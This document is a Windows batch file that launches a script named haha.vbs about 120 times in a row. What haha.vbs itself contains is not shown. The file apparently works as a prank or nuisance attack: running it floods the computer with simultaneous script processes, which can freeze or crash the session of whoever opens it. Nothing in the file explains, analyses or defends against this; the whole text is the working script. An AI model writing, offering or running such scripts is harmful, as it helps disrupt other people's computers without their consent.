@echo off
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
